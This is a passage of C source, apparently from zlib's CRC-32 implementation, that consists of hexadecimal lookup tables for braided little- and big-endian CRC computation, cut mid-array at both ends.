0x052ffb85, 0x9e5c1151, 0xe8b9286c, 0x73cac2b8, 0x04b89f7c, 0x9fcb75a8, 0xe92e4c95, 0x725da641, 0x04e43eef, 0x9f97d43b, 0xe972ed06, 0x720107d2, 0x0401dc5a, 0x9f72368e, 0xe9970fb3, 0x72e4e567, 0x045d7dc9, 0x9f2e971d, 0xe9cbae20, 0x72b844f4, 0x072f15a8, 0x9c5cff7c, 0xeab9c641, 0x71ca2c95, 0x0773b43b, 0x9c005eef, 0xeae567d2, 0x71968d06, 0x0796568e, 0x9ce5bc5a, 0xea008567, 0x71736fb3, 0x07caf71d, 0x9cb91dc9, 0xea5c24f4, 0x712fce20, 0x065d93e4, 0x9d2e7930, 0xebcb400d, 0x70b8aad9, 0x06013277, 0x9d72d8a3, 0xeb97e19e, 0x70e40b4a, 0x06e4d0c2, 0x9d973a16, 0xeb72032b, 0x7001e9ff, 0x06b87151, 0x9dcb9b85, 0xeb2ea2b8, 0x705d486c, 0x0b943260, 0x90e7d8b4, 0xe602e189, 0x7d710b5d, 0x0bc893f3, 0x90bb7927, 0xe65e401a, 0x7d2daace, 0x0b2d7146, 0x905e9b92, 0xe6bba2af, 0x7dc8487b, 0x0b71d0d5, 0x90023a01, 0xe6e7033c, 0x7d94e9e8, 0x0ae6b42c, 0x91955ef8, 0xe77067c5, 0x7c038d11, 0x0aba15bf, 0x91c9ff6b, 0xe72cc656, 0x7c5f2c82, 0x0a5ff70a, 0x912c1dde, 0xe7c924e3, 0x7cbace37, 0x0a035699, 0x9170bc4d, 0xe7958570, 0x7ce66fa4, 0x09713ef8, 0x9202d42c, 0xe4e7ed11, 0x7f9407c5, 0x092d9f6b, 0x925e75bf, 0xe4bb4c82, 0x7fc8a656, 0x09c87dde, 0x92bb970a, 0xe45eae37, 0x7f2d44e3, 0x0994dc4d, 0x92e73699, 0xe4020fa4, 0x7f71e570, 0x0803b8b4, 0x93705260, 0xe5956b5d, 0x7ee68189, 0x085f1927, 0x932cf3f3, 0xe5c9cace, 0x7eba201a, 0x08bafb92, 0x93c91146, 0xe52c287b, 0x7e5fc2af, 0x08e65a01, 0x9395b0d5, 0xe57089e8, 0x7e03633c, 0x0e5e2b50, 0x952dc184, 0xe3c8f8b9, 0x78bb126d, 0x0e028ac3, 0x95716017, 0xe394592a, 0x78e7b3fe, 0x0ee76876, 0x959482a2, 0xe371bb9f, 0x7802514b, 0x0ebbc9e5, 0x95c82331, 0xe32d1a0c, 0x785ef0d8, 0x0f2cad1c, 0x945f47c8, 0xe2ba7ef5, 0x79c99421, 0x0f700c8f, 0x9403e65b, 0xe2e6df66, 0x799535b2, 0x0f95ee3a, 0x94e604ee, 0xe2033dd3, 0x7970d707, 0x0fc94fa9, 0x94baa57d, 0xe25f9c40, 0x792c7694, 0x0cbb27c8, 0x97c8cd1c, 0xe12df421, 0x7a5e1ef5, 0x0ce7865b, 0x97946c8f, 0xe17155b2, 0x7a02bf66, 0x0c0264ee, 0x97718e3a, 0xe194b707, 0x7ae75dd3, 0x0c5ec57d, 0x972d2fa9, 0xe1c81694, 0x7abbfc40, 0x0dc9a184, 0x96ba4b50, 0xe05f726d, 0x7b2c98b9, 0x0d950017, 0x96e6eac3, 0xe003d3fe, 0x7b70392a, 0x0d70e2a2, 0x96030876, 0xe0e6314b, 0x7b95db9f, 0x0d2c4331, 0x965fa9e5, 0xe0ba90d8, 0x7bc97a0c}, {0x00000000, 0x172864c0, 0x2e50c980, 0x3978ad40, 0x5ca19300, 0x4b89f7c0, 0x72f15a80, 0x65d93e40, 0xb9432600, 0xae6b42c0, 0x9713ef80, 0x803b8b40, 0xe5e2b500, 0xf2cad1c0, 0xcbb27c80, 0xdc9a1840, 0xa9f74a41, 0xbedf2e81, 0x87a783c1, 0x908fe701, 0xf556d941, 0xe27ebd81, 0xdb0610c1, 0xcc2e7401, 0x10b46c41, 0x079c0881, 0x3ee4a5c1, 0x29ccc101, 0x4c15ff41, 0x5b3d9b81, 0x624536c1, 0x756d5201, 0x889f92c3, 0x9fb7f603, 0xa6cf5b43, 0xb1e73f83, 0xd43e01c3, 0xc3166503, 0xfa6ec843, 0xed46ac83, 0x31dcb4c3, 0x26f4d003, 0x1f8c7d43, 0x08a41983, 0x6d7d27c3, 0x7a554303, 0x432dee43, 0x54058a83, 0x2168d882, 0x3640bc42, 0x0f381102, 0x181075c2, 0x7dc94b82, 0x6ae12f42, 0x53998202, 0x44b1e6c2, 0x982bfe82, 0x8f039a42, 0xb67b3702, 0xa15353c2, 0xc48a6d82, 0xd3a20942, 0xeadaa402, 0xfdf2c0c2, 0xca4e23c7, 0xdd664707, 0xe41eea47, 0xf3368e87, 0x96efb0c7, 0x81c7d407, 0xb8bf7947, 0xaf971d87, 0x730d05c7, 0x64256107, 0x5d5dcc47, 0x4a75a887, 0x2fac96c7, 0x3884f207, 0x01fc5f47, 0x16d43b87, 0x63b96986, 0x74910d46, 0x4de9a006, 0x5ac1c4c6, 0x3f18fa86, 0x28309e46, 0x11483306, 0x066057c6, 0xdafa4f86, 0xcdd22b46, 0xf4aa8606, 0xe382e2c6, 0x865bdc86, 0x9173b846, 0xa80b1506, 0xbf2371c6, 0x42d1b104, 0x55f9d5c4, 0x6c817884, 0x7ba91c44, 0x1e702204, 0x095846c4, 0x3020eb84, 0x27088f44, 0xfb929704, 0xecbaf3c4, 0xd5c25e84, 0xc2ea3a44, 0xa7330404, 0xb01b60c4, 0x8963cd84, 0x9e4ba944, 0xeb26fb45, 0xfc0e9f85, 0xc57632c5, 0xd25e5605, 0xb7876845, 0xa0af0c85, 0x99d7a1c5, 0x8effc505, 0x5265dd45, 0x454db985, 0x7c3514c5, 0x6b1d7005, 0x0ec44e45, 0x19ec2a85, 0x209487c5, 0x37bce305, 0x4fed41cf, 0x58c5250f, 0x61bd884f, 0x7695ec8f, 0x134cd2cf, 0x0464b60f, 0x3d1c1b4f, 0x2a347f8f, 0xf6ae67cf, 0xe186030f, 0xd8feae4f, 0xcfd6ca8f, 0xaa0ff4cf, 0xbd27900f, 0x845f3d4f, 0x9377598f, 0xe61a0b8e, 0xf1326f4e, 0xc84ac20e, 0xdf62a6ce, 0xbabb988e, 0xad93fc4e, 0x94eb510e, 0x83c335ce, 0x5f592d8e, 0x4871494e, 0x7109e40e, 0x662180ce, 0x03f8be8e, 0x14d0da4e, 0x2da8770e, 0x3a8013ce, 0xc772d30c, 0xd05ab7cc, 0xe9221a8c, 0xfe0a7e4c, 0x9bd3400c, 0x8cfb24cc, 0xb583898c, 0xa2abed4c, 0x7e31f50c, 0x691991cc, 0x50613c8c, 0x4749584c, 0x2290660c, 0x35b802cc, 0x0cc0af8c, 0x1be8cb4c, 0x6e85994d, 0x79adfd8d, 0x40d550cd, 0x57fd340d, 0x32240a4d, 0x250c6e8d, 0x1c74c3cd, 0x0b5ca70d, 0xd7c6bf4d, 0xc0eedb8d, 0xf99676cd, 0xeebe120d, 0x8b672c4d, 0x9c4f488d, 0xa537e5cd, 0xb21f810d, 0x85a36208, 0x928b06c8, 0xabf3ab88, 0xbcdbcf48, 0xd902f108, 0xce2a95c8, 0xf7523888, 0xe07a5c48, 0x3ce04408, 0x2bc820c8, 0x12b08d88, 0x0598e948, 0x6041d708, 0x7769b3c8, 0x4e111e88, 0x59397a48, 0x2c542849, 0x3b7c4c89, 0x0204e1c9, 0x152c8509, 0x70f5bb49, 0x67dddf89, 0x5ea572c9, 0x498d1609, 0x95170e49, 0x823f6a89, 0xbb47c7c9, 0xac6fa309, 0xc9b69d49, 0xde9ef989, 0xe7e654c9, 0xf0ce3009, 0x0d3cf0cb, 0x1a14940b, 0x236c394b, 0x34445d8b, 0x519d63cb, 0x46b5070b, 0x7fcdaa4b, 0x68e5ce8b, 0xb47fd6cb, 0xa357b20b, 0x9a2f1f4b, 0x8d077b8b, 0xe8de45cb, 0xfff6210b, 0xc68e8c4b, 0xd1a6e88b, 0xa4cbba8a, 0xb3e3de4a, 0x8a9b730a, 0x9db317ca, 0xf86a298a, 0xef424d4a, 0xd63ae00a, 0xc11284ca, 0x1d889c8a, 0x0aa0f84a, 0x33d8550a, 0x24f031ca, 0x41290f8a, 0x56016b4a, 0x6f79c60a, 0x7851a2ca}, {0x00000000, 0x9fda839e, 0xe4c4017d, 0x7b1e82e3, 0x12f904bb, 0x8d238725, 0xf63d05c6, 0x69e78658, 0x25f20976, 0xba288ae8, 0xc136080b, 0x5eec8b95, 0x370b0dcd, 0xa8d18e53, 0xd3cf0cb0, 0x4c158f2e, 0x4be412ec, 0xd43e9172, 0xaf201391, 0x30fa900f, 0x591d1657, 0xc6c795c9, 0xbdd9172a, 0x220394b4, 0x6e161b9a, 0xf1cc9804, 0x8ad21ae7, 0x15089979, 0x7cef1f21, 0xe3359cbf, 0x982b1e5c, 0x07f19dc2, 0x97c825d8, 0x0812a646, 0x730c24a5, 0xecd6a73b, 0x85312163, 0x1aeba2fd, 0x61f5201e, 0xfe2fa380, 0xb23a2cae, 0x2de0af30, 0x56fe2dd3, 0xc924ae4d, 0xa0c32815, 0x3f19ab8b, 0x44072968, 0xdbddaaf6, 0xdc2c3734, 0x43f6b4aa, 0x38e83649, 0xa732b5d7, 0xced5338f, 0x510fb011, 0x2a1132f2, 0xb5cbb16c, 0xf9de3e42, 0x6604bddc, 0x1d1a3f3f, 0x82c0bca1, 0xeb273af9, 0x74fdb967, 0x0fe33b84, 0x9039b81a, 0xf4e14df1, 0x6b3bce6f, 0x10254c8c, 0x8fffcf12, 0xe618494a, 0x79c2cad4, 0x02dc4837, 0x9d06cba9, 0xd1134487, 0x4ec9c719, 0x35d745fa, 0xaa0dc664, 0xc3ea403c, 0x5c30c3a2, 0x272e4141, 0xb8f4c2df, 0xbf055f1d, 0x20dfdc83, 0x5bc15e60, 0xc41bddfe, 0xadfc5ba6, 0x3226d838, 0x49385adb, 0xd6e2d945, 0x9af7566b, 0x052dd5f5, 0x7e335716, 0xe1e9d488, 0x880e52d0, 0x17d4d14e, 0x6cca53ad, 0xf310d033, 0x63296829, 0xfcf3ebb7, 0x87ed6954, 0x1837eaca, 0x71d06c92, 0xee0aef0c, 0x95146def, 0x0aceee71, 0x46db615f, 0xd901e2c1, 0xa21f6022, 0x3dc5e3bc, 0x542265e4, 0xcbf8e67a, 0xb0e66499, 0x2f3ce707, 0x28cd7ac5, 0xb717f95b, 0xcc097bb8, 0x53d3f826, 0x3a347e7e, 0xa5eefde0, 0xdef07f03, 0x412afc9d, 0x0d3f73b3, 0x92e5f02d, 0xe9fb72ce, 0x7621f150, 0x1fc67708, 0x801cf496, 0xfb027675, 0x64d8f5eb, 0x32b39da3, 0xad691e3d, 0xd6779cde, 0x49ad1f40, 0x204a9918, 0xbf901a86, 0xc48e9865, 0x5b541bfb, 0x174194d5, 0x889b174b, 0xf38595a8, 0x6c5f1636, 0x05b8906e, 0x9a6213f0, 0xe17c9113, 0x7ea6128d, 0x79578f4f, 0xe68d0cd1, 0x9d938e32, 0x02490dac, 0x6bae8bf4, 0xf474086a, 0x8f6a8a89, 0x10b00917, 0x5ca58639, 0xc37f05a7, 0xb8618744, 0x27bb04da, 0x4e5c8282, 0xd186011c, 0xaa9883ff, 0x35420061, 0xa57bb87b, 0x3aa13be5, 0x41bfb906, 0xde653a98, 0xb782bcc0, 0x28583f5e, 0x5346bdbd, 0xcc9c3e23, 0x8089b10d, 0x1f533293, 0x644db070, 0xfb9733ee, 0x9270b5b6, 0x0daa3628, 0x76b4b4cb, 0xe96e3755, 0xee9faa97, 0x71452909, 0x0a5babea, 0x95812874, 0xfc66ae2c, 0x63bc2db2, 0x18a2af51, 0x87782ccf, 0xcb6da3e1, 0x54b7207f, 0x2fa9a29c, 0xb0732102, 0xd994a75a, 0x464e24c4, 0x3d50a627, 0xa28a25b9, 0xc652d052, 0x598853cc, 0x2296d12f, 0xbd4c52b1, 0xd4abd4e9, 0x4b715777, 0x306fd594, 0xafb5560a, 0xe3a0d924, 0x7c7a5aba, 0x0764d859, 0x98be5bc7, 0xf159dd9f, 0x6e835e01, 0x159ddce2, 0x8a475f7c, 0x8db6c2be, 0x126c4120, 0x6972c3c3, 0xf6a8405d, 0x9f4fc605, 0x0095459b, 0x7b8bc778, 0xe45144e6, 0xa844cbc8, 0x379e4856, 0x4c80cab5, 0xd35a492b, 0xbabdcf73, 0x25674ced, 0x5e79ce0e, 0xc1a34d90, 0x519af58a, 0xce407614, 0xb55ef4f7, 0x2a847769, 0x4363f131, 0xdcb972af, 0xa7a7f04c, 0x387d73d2, 0x7468fcfc, 0xebb27f62, 0x90acfd81, 0x0f767e1f, 0x6691f847, 0xf94b7bd9, 0x8255f93a, 0x1d8f7aa4, 0x1a7ee766, 0x85a464f8, 0xfebae61b, 0x61606585, 0x0887e3dd, 0x975d6043, 0xec43e2a0, 0x7399613e, 0x3f8cee10, 0xa0566d8e, 0xdb48ef6d, 0x44926cf3, 0x2d75eaab, 0xb2af6935, 0xc9b1ebd6, 0x566b6848}}; local const z_word_t FAR crc_braid_big_table[][256] = { {0x00000000, 0x9e83da9f, 0x7d01c4e4, 0xe3821e7b, 0xbb04f912, 0x2587238d, 0xc6053df6, 0x5886e769, 0x7609f225, 0xe88a28ba, 0x0b0836c1, 0x958bec5e, 0xcd0d0b37, 0x538ed1a8, 0xb00ccfd3, 0x2e8f154c, 0xec12e44b, 0x72913ed4, 0x911320af, 0x0f90fa30, 0x57161d59, 0xc995c7c6, 0x2a17d9bd, 0xb4940322, 0x9a1b166e, 0x0498ccf1, 0xe71ad28a, 0x79990815, 0x211fef7c, 0xbf9c35e3, 0x5c1e2b98, 0xc29df107, 0xd825c897, 0x46a61208, 0xa5240c73, 0x3ba7d6ec, 0x63213185, 0xfda2eb1a, 0x1e20f561, 0x80a32ffe, 0xae2c3ab2, 0x30afe02d, 0xd32dfe56, 0x4dae24c9, 0x1528c3a0, 0x8bab193f, 0x68290744, 0xf6aadddb, 0x34372cdc, 0xaab4f643, 0x4936e838, 0xd7b532a7, 0x8f33d5ce, 0x11b00f51, 0xf232112a, 0x6cb1cbb5, 0x423edef9, 0xdcbd0466, 0x3f3f1a1d, 0xa1bcc082, 0xf93a27eb, 0x67b9fd74, 0x843be30f, 0x1ab83990, 0xf14de1f4, 0x6fce3b6b, 0x8c4c2510, 0x12cfff8f, 0x4a4918e6, 0xd4cac279, 0x3748dc02, 0xa9cb069d, 0x874413d1, 0x19c7c94e, 0xfa45d735, 0x64c60daa, 0x3c40eac3, 0xa2c3305c, 0x41412e27, 0xdfc2f4b8, 0x1d5f05bf, 0x83dcdf20, 0x605ec15b, 0xfedd1bc4, 0xa65bfcad, 0x38d82632, 0xdb5a3849, 0x45d9e2d6, 0x6b56f79a, 0xf5d52d05, 0x1657337e, 0x88d4e9e1, 0xd0520e88, 0x4ed1d417, 0xad53ca6c, 0x33d010f3, 0x29682963, 0xb7ebf3fc, 0x5469ed87, 0xcaea3718, 0x926cd071, 0x0cef0aee, 0xef6d1495, 0x71eece0a, 0x5f61db46, 0xc1e201d9, 0x22601fa2, 0xbce3c53d, 0xe4652254, 0x7ae6f8cb, 0x9964e6b0, 0x07e73c2f, 0xc57acd28, 0x5bf917b7, 0xb87b09cc, 0x26f8d353, 0x7e7e343a, 0xe0fdeea5, 0x037ff0de, 0x9dfc2a41, 0xb3733f0d, 0x2df0e592, 0xce72fbe9, 0x50f12176, 0x0877c61f, 0x96f41c80, 0x757602fb, 0xebf5d864, 0xa39db332, 0x3d1e69ad, 0xde9c77d6, 0x401fad49, 0x18994a20, 0x861a90bf, 0x65988ec4, 0xfb1b545b, 0xd5944117, 0x4b179b88, 0xa89585f3, 0x36165f6c, 0x6e90b805, 0xf013629a, 0x13917ce1, 0x8d12a67e, 0x4f8f5779, 0xd10c8de6, 0x328e939d, 0xac0d4902, 0xf48bae6b, 0x6a0874f4, 0x898a6a8f, 0x1709b010, 0x3986a55c, 0xa7057fc3, 0x448761b8, 0xda04bb27, 0x82825c4e, 0x1c0186d1, 0xff8398aa, 0x61004235, 0x7bb87ba5, 0xe53ba13a, 0x06b9bf41, 0x983a65de, 0xc0bc82b7, 0x5e3f5828, 0xbdbd4653, 0x233e9ccc, 0x0db18980, 0x9332531f, 0x70b04d64, 0xee3397fb, 0xb6b57092, 0x2836aa0d, 0xcbb4b476, 0x55376ee9, 0x97aa9fee, 0x09294571, 0xeaab5b0a, 0x74288195, 0x2cae66fc, 0xb22dbc63, 0x51afa218, 0xcf2c7887, 0xe1a36dcb, 0x7f20b754, 0x9ca2a92f, 0x022173b0, 0x5aa794d9, 0xc4244e46, 0x27a6503d, 0xb9258aa2, 0x52d052c6, 0xcc538859, 0x2fd19622, 0xb1524cbd, 0xe9d4abd4, 0x7757714b, 0x94d56f30, 0x0a56b5af, 0x24d9a0e3, 0xba5a7a7c, 0x59d86407, 0xc75bbe98, 0x9fdd59f1, 0x015e836e, 0xe2dc9d15, 0x7c5f478a, 0xbec2b68d, 0x20416c12, 0xc3c37269, 0x5d40a8f6, 0x05c64f9f, 0x9b459500, 0x78c78b7b, 0xe64451e4, 0xc8cb44a8, 0x56489e37, 0xb5ca804c, 0x2b495ad3, 0x73cfbdba, 0xed4c6725, 0x0ece795e, 0x904da3c1, 0x8af59a51, 0x147640ce, 0xf7f45eb5, 0x6977842a, 0x31f16343, 0xaf72b9dc, 0x4cf0a7a7, 0xd2737d38, 0xfcfc6874, 0x627fb2eb, 0x81fdac90, 0x1f7e760f, 0x47f89166, 0xd97b4bf9, 0x3af95582, 0xa47a8f1d, 0x66e77e1a, 0xf864a485, 0x1be6bafe, 0x85656061, 0xdde38708, 0x43605d97, 0xa0e243ec, 0x3e619973, 0x10ee8c3f, 0x8e6d56a0, 0x6def48db, 0xf36c9244, 0xabea752d, 0x3569afb2, 0xd6ebb1c9, 0x48686b56}, {0x00000000, 0xc0642817, 0x80c9502e, 0x40ad7839, 0x0093a15c, 0xc0f7894b, 0x805af172, 0x403ed965, 0x002643b9, 0xc0426bae, 0x80ef1397, 0x408b3b80, 0x00b5e2e5, 0xc0d1caf2, 0x807cb2cb, 0x40189adc, 0x414af7a9, 0x812edfbe, 0xc183a787, 0x01e78f90, 0x41d956f5, 0x81bd7ee2, 0xc11006db, 0x01742ecc, 0x416cb410, 0x81089c07, 0xc1a5e43e, 0x01c1cc29, 0x41ff154c, 0x819b3d5b, 0xc1364562, 0x01526d75, 0xc3929f88, 0x03f6b79f, 0x435bcfa6, 0x833fe7b1, 0xc3013ed4, 0x036516c3, 0x43c86efa, 0x83ac46ed, 0xc3b4dc31, 0x03d0f426, 0x437d8c1f, 0x8319a408, 0xc3277d6d, 0x0343557a, 0x43ee2d43, 0x838a0554, 0x82d86821, 0x42bc4036, 0x0211380f, 0xc2751018, 0x824bc97d, 0x422fe16a, 0x02829953, 0xc2e6b144, 0x82fe2b98, 0x429a038f, 0x02377bb6, 0xc25353a1, 0x826d8ac4, 0x4209a2d3, 0x02a4daea, 0xc2c0f2fd, 0xc7234eca, 0x074766dd, 0x47ea1ee4, 0x878e36f3, 0xc7b0ef96, 0x07d4c781, 0x4779bfb8, 0x871d97af, 0xc7050d73, 0x07612564, 0x47cc5d5d, 0x87a8754a, 0xc796ac2f, 0x07f28438, 0x475ffc01, 0x873bd416, 0x8669b963, 0x460d9174, 0x06a0e94d, 0xc6c4c15a, 0x86fa183f, 0x469e3028, 0x06334811, 0xc6576006, 0x864ffada, 0x462bd2cd, 0x0686aaf4, 0xc6e282e3, 0x86dc5b86, 0x46b87391, 0x06150ba8, 0xc67123bf, 0x04b1d142, 0xc4d5f955, 0x8478816c, 0x441ca97b, 0x0422701e, 0xc4465809, 0x84eb2030, 0x448f0827, 0x049792fb, 0xc4f3baec, 0x845ec2d5, 0x443aeac2, 0x040433a7, 0xc4601bb0, 0x84cd6389, 0x44a94b9e, 0x45fb26eb, 0x859f0efc, 0xc53276c5, 0x05565ed2, 0x456887b7, 0x850cafa0, 0xc5a1d799, 0x05c5ff8e, 0x45dd6552, 0x85b94d45, 0xc514357c, 0x05701d6b, 0x454ec40e, 0x852aec19, 0xc5879420, 0x05e3bc37, 0xcf41ed4f, 0x0f25c558, 0x4f88bd61, 0x8fec9576, 0xcfd24c13, 0x0fb66404, 0x4f1b1c3d, 0x8f7f342a, 0xcf67aef6, 0x0f0386e1, 0x4faefed8, 0x8fcad6cf, 0xcff40faa, 0x0f9027bd, 0x4f3d5f84, 0x8f597793, 0x8e0b1ae6, 0x4e6f32f1, 0x0ec24ac8, 0xcea662df, 0x8e98bbba, 0x4efc93ad, 0x0e51eb94, 0xce35c383, 0x8e2d595f, 0x4e497148, 0x0ee40971, 0xce802166, 0x8ebef803, 0x4edad014, 0x0e77a82d, 0xce13803a, 0x0cd372c7, 0xccb75ad0, 0x8c1a22e9, 0x4c7e0afe, 0x0c40d39b, 0xcc24fb8c, 0x8c8983b5, 0x4cedaba2, 0x0cf5317e, 0xcc911969, 0x8c3c6150, 0x4c584947, 0x0c669022, 0xcc02b835, 0x8cafc00c, 0x4ccbe81b, 0x4d99856e, 0x8dfdad79, 0xcd50d540, 0x0d34fd57, 0x4d0a2432, 0x8d6e0c25, 0xcdc3741c, 0x0da75c0b, 0x4dbfc6d7, 0x8ddbeec0, 0xcd7696f9, 0x0d12beee, 0x4d2c678b, 0x8d484f9c, 0xcde537a5, 0x0d811fb2, 0x0862a385, 0xc8068b92, 0x88abf3ab, 0x48cfdbbc, 0x08f102d9, 0xc8952ace, 0x883852f7, 0x485c7ae0, 0x0844e03c, 0xc820c82b, 0x888db012, 0x48e99805, 0x08d74160, 0xc8b36977, 0x881e114e, 0x487a3959, 0x4928542c, 0x894c7c3b, 0xc9e10402, 0x09852c15, 0x49bbf570, 0x89dfdd67, 0xc972a55e, 0x09168d49, 0x490e1795, 0x896a3f82, 0xc9c747bb, 0x09a36fac, 0x499db6c9, 0x89f99ede, 0xc954e6e7, 0x0930cef0, 0xcbf03c0d, 0x0b94141a, 0x4b396c23, 0x8b5d4434, 0xcb639d51, 0x0b07b546, 0x4baacd7f, 0x8bcee568, 0xcbd67fb4, 0x0bb257a3, 0x4b1f2f9a, 0x8b7b078d, 0xcb45dee8, 0x0b21f6ff, 0x4b8c8ec6, 0x8be8a6d1, 0x8abacba4, 0x4adee3b3, 0x0a739b8a, 0xca17b39d, 0x8a296af8, 0x4a4d42ef, 0x0ae03ad6, 0xca8412c1, 0x8a9c881d, 0x4af8a00a, 0x0a55d833, 0xca31f024, 0x8a0f2941, 0x4a6b0156, 0x0ac6796f, 0xcaa25178}, {0x00000000, 0xd4ea739b, 0xe9d396ed, 0x3d39e576, 0x93a15c00, 0x474b2f9b, 0x7a72caed, 0xae98b976, 0x2643b900, 0xf2a9ca9b, 0xcf902fed, 0x1b7a5c76, 0xb5e2e500, 0x6108969b, 0x5c3173ed, 0x88db0076, 0x4c867201, 0x986c019a, 0xa555e4ec, 0x71bf9777, 0xdf272e01, 0x0bcd5d9a, 0x36f4b8ec, 0xe21ecb77, 0x6ac5cb01, 0xbe2fb89a, 0x83165dec, 0x57fc2e77, 0xf9649701, 0x2d8ee49a, 0x10b701ec, 0xc45d7277, 0x980ce502, 0x4ce69699, 0x71df73ef, 0xa5350074, 0x0badb902, 0xdf47ca99, 0xe27e2fef, 0x36945c74, 0xbe4f5c02, 0x6aa52f99, 0x579ccaef, 0x8376b974, 0x2dee0002, 0xf9047399, 0xc43d96ef, 0x10d7e574, 0xd48a9703, 0x0060e498, 0x3d5901ee, 0xe9b37275, 0x472bcb03, 0x93c1b898, 0xaef85dee, 0x7a122e75, 0xf2c92e03, 0x26235d98, 0x1b1ab8ee, 0xcff0cb75, 0x61687203, 0xb5820198, 0x88bbe4ee, 0x5c519775, 0x3019ca05, 0xe4f3b99e, 0xd9ca5ce8, 0x0d202f73, 0xa3b89605, 0x7752e59e, 0x4a6b00e8, 0x9e817373, 0x165a7305, 0xc2b0009e, 0xff89e5e8, 0x2b639673, 0x85fb2f05, 0x51115c9e, 0x6c28b9e8, 0xb8c2ca73, 0x7c9fb804, 0xa875cb9f, 0x954c2ee9, 0x41a65d72, 0xef3ee404, 0x3bd4979f, 0x06ed72e9, 0xd2070172, 0x5adc0104, 0x8e36729f, 0xb30f97e9, 0x67e5e472, 0xc97d5d04, 0x1d972e9f, 0x20aecbe9, 0xf444b872, 0xa8152f07, 0x7cff5c9c, 0x41c6b9ea, 0x952cca71, 0x3bb47307, 0xef5e009c, 0xd267e5ea, 0x068d9671, 0x8e569607, 0x5abce59c, 0x678500ea, 0xb36f7371, 0x1df7ca07, 0xc91db99c, 0xf4245cea, 0x20ce2f71, 0xe4935d06, 0x30792e9d, 0x0d40cbeb, 0xd9aab870, 0x77320106, 0xa3d8729d, 0x9ee197eb, 0x4a0be470, 0xc2d0e406, 0x163a979d, 0x2b0372eb, 0xffe90170, 0x5171b806, 0x859bcb9d, 0xb8a22eeb, 0x6c485d70, 0x6032940b, 0xb4d8e790, 0x89e102e6, 0x5d0b717d, 0xf393c80b, 0x2779bb90, 0x1a405ee6, 0xceaa2d7d, 0x46712d0b, 0x929b5e90, 0xafa2bbe6, 0x7b48c87d, 0xd5d0710b, 0x013a0290, 0x3c03e7e6, 0xe8e9947d, 0x2cb4e60a, 0xf85e9591, 0xc56770e7, 0x118d037c, 0xbf15ba0a, 0x6bffc991, 0x56c62ce7, 0x822c5f7c, 0x0af75f0a, 0xde1d2c91, 0xe324c9e7, 0x37ceba7c, 0x9956030a, 0x4dbc7091, 0x708595e7, 0xa46fe67c, 0xf83e7109, 0x2cd40292, 0x11ede7e4, 0xc507947f, 0x6b9f2d09, 0xbf755e92, 0x824cbbe4, 0x56a6c87f, 0xde7dc809, 0x0a97bb92, 0x37ae5ee4, 0xe3442d7f, 0x4ddc9409, 0x9936e792, 0xa40f02e4, 0x70e5717f, 0xb4b80308, 0x60527093, 0x5d6b95e5, 0x8981e67e, 0x27195f08, 0xf3f32c93, 0xcecac9e5, 0x1a20ba7e, 0x92fbba08, 0x4611c993, 0x7b282ce5, 0xafc25f7e, 0x015ae608, 0xd5b09593, 0xe88970e5, 0x3c63037e, 0x502b5e0e, 0x84c12d95, 0xb9f8c8e3, 0x6d12bb78, 0xc38a020e, 0x17607195, 0x2a5994e3, 0xfeb3e778, 0x7668e70e, 0xa2829495, 0x9fbb71e3, 0x4b510278, 0xe5c9bb0e, 0x3123c895, 0x0c1a2de3, 0xd8f05e78, 0x1cad2c0f, 0xc8475f94, 0xf57ebae2, 0x2194c979, 0x8f0c700f, 0x5be60394, 0x66dfe6e2, 0xb2359579, 0x3aee950f, 0xee04e694, 0xd33d03e2, 0x07d77079, 0xa94fc90f, 0x7da5ba94, 0x409c5fe2, 0x94762c79, 0xc827bb0c, 0x1ccdc897, 0x21f42de1, 0xf51e5e7a, 0x5b86e70c, 0x8f6c9497, 0xb25571e1, 0x66bf027a, 0xee64020c, 0x3a8e7197, 0x07b794e1, 0xd35de77a, 0x7dc55e0c, 0xa92f2d97, 0x9416c8e1, 0x40fcbb7a, 0x84a1c90d, 0x504bba96, 0x6d725fe0, 0xb9982c7b, 0x1700950d, 0xc3eae696, 0xfed303e0, 0x2a39707b, 0xa2e2700d, 0x76080396, 0x4b31e6e0, 0x9fdb957b, 0x31432c0d, 0xe5a95f96, 0xd890bae0, 0x0c7ac97b}, {0x00000000, 0x27652581, 0x0fcc3bd9, 0x28a91e58, 0x5f9e0669, 0x78fb23e8, 0x50523db0, 0x77371831, 0xbe3c0dd2, 0x99592853, 0xb1f0360b, 0x9695138a, 0xe1a20bbb, 0xc6c72e3a, 0xee6e3062, 0xc90b15e3, 0x3d7f6b7f, 0x1a1a4efe, 0x32b350a6, 0x15d67527, 0x62e16d16, 0x45844897, 0x6d2d56cf, 0x4a48734e, 0x834366ad, 0xa426432c, 0x8c8f5d74, 0xabea78f5, 0xdcdd60c4, 0xfbb84545, 0xd3115b1d, 0xf4747e9c, 0x7afed6fe, 0x5d9bf37f, 0x7532ed27, 0x5257c8a6, 0x2560d097, 0x0205f516, 0x2aaceb4e, 0x0dc9cecf, 0xc4c2db2c, 0xe3a7fead, 0xcb0ee0f5, 0xec6bc574, 0x9b5cdd45, 0xbc39f8c4, 0x9490e69c, 0xb3f5c31d, 0x4781bd81, 0x60e49800, 0x484d8658, 0x6f28a3d9, 0x181fbbe8, 0x3f7a9e69, 0x17d38031, 0x30b6a5b0, 0xf9bdb053, 0xded895d2, 0xf6718b8a, 0xd114ae0b, 0xa623b63a, 0x814693bb, 0xa9ef8de3, 0x8e8aa862, 0xb5fadc26, 0x929ff9a7, 0xba36e7ff, 0x9d53c27e, 0xea64da4f, 0xcd01ffce, 0xe5a8e196, 0xc2cdc417, 0x0bc6d1f4, 0x2ca3f475, 0x040aea2d, 0x236fcfac, 0x5458d79d, 0x733df21c, 0x5b94ec44, 0x7cf1c9c5, 0x8885b759, 0xafe092d8, 0x87498c80, 0xa02ca901, 0xd71bb130, 0xf07e94b1, 0xd8d78ae9, 0xffb2af68, 0x36b9ba8b, 0x11dc9f0a, 0x39758152, 0x1e10a4d3, 0x6927bce2, 0x4e429963, 0x66eb873b, 0x418ea2ba, 0xcf040ad8, 0xe8612f59, 0xc0c83101, 0xe7ad1480, 0x909a0cb1, 0xb7ff2930, 0x9f563768, 0xb83312e9, 0x7138070a, 0x565d228b, 0x7ef43cd3, 0x59911952, 0x2ea60163, 0x09c324e2, 0x216a3aba, 0x060f1f3b, 0xf27b61a7, 0xd51e4426, 0xfdb75a7e, 0xdad27fff, 0xade567ce, 0x8a80424f, 0xa2295c17, 0x854c7996, 0x4c476c75, 0x6b2249f4, 0x438b57ac, 0x64ee722d, 0x13d96a1c, 0x34bc4f9d, 0x1c1551c5, 0x3b707444, 